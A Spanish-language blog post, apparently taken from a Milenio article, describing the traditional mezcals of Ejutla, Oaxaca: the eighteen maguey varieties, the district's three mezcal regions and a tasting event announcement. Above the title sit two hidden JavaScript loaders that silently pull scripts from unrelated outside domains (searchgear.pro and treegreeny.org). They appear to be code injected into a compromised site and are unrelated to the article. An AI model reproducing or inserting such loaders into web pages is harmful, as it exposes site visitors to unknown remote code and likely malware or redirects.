;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 5. Los Mezcales Tradicionales de Ejutla, Oaxaca

5. Los Mezcales Tradicionales de Ejutla, Oaxaca


Un día sin Mezcal,
es como un día sin sol.

Tío Jaime, oriundo de Ejutla

El Distrito de Ejutla, cuya cabecera distrital es Ejutla de Crespo, se localiza a 60 km. de la ciudad de Oaxaca. El Gusto Histórico de sus Mezcales es resultado de los diferentes Magueyes utilizados, del empleo de alambiques de cobre y de la maestría de los Maestros Mezcalilleros. Se caracterizan por ser ricos en aromas y en sabores pronunciados y duraderos, destacando siempre el intenso y delicado aroma y sabor a Maguey; por su riqueza alcohólica que debe estar entre los 47 y los 70° G.L.; por su hermoso perleado, que forma una capa completa de perlas llamada cordón cerrado; por su extraordinario cuerpo y ligereza en la boca y por elaborase estrictamente de forma natural, es decir, sin químicos.
Los Magueyes empleados (18) son: Arroqueño, Barril, Caballo, Coyote, Cuishito, Chino, Espadín, Jabalí, Mexicano o Chontal, Mexicano Penca Larga, Mexicano Liso, San Martinero, Sierra Negra, Sierrudo, Tepextate, Tobalá, Tobasiche Corto y Tobasiche Largo. Cada uno con diferente tiempo de maduración, forma de rasurar, tiempo de cocción, de fermentación y modo de cargar el alambique, lo que –de entrada- arroja 18 Mezcales de sabores y aromas diferentes, más las posibles e infinitas combinaciones que pueden hacerse entre ellos, a las que hay que agregar el número de fábricas, de Maestros Mezcalilleros, y de temporadas y zonas de corte del Maguey.
Al Distrito de Ejutla podemos dividirlo en tres Regiones Mezcaleras: la occidental, con poblaciones como Zeguiche, Yogana, Amatengo, La Noria, El Sauz y La Compañía; la oriental, donde se localizan Andrés Niño, Peña Larga y La Escalera; y San Vicente Coatlán.
Para aventurarse en la Región Mezcalera Occidental de Ejutla y en su Gusto Histórico, se presentarán el Paquete Educativo Ejuteco con 3 Mezcales Tradicionales, y el Boletín BiblioMezcalófilo # 3 el martes 29 de diciembre a las 20:00 horas en Red Fly: Orizaba 145, col. Roma, Ciudad de México. La entrada es libre.
http://impreso.milenio.com/node/8694233

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *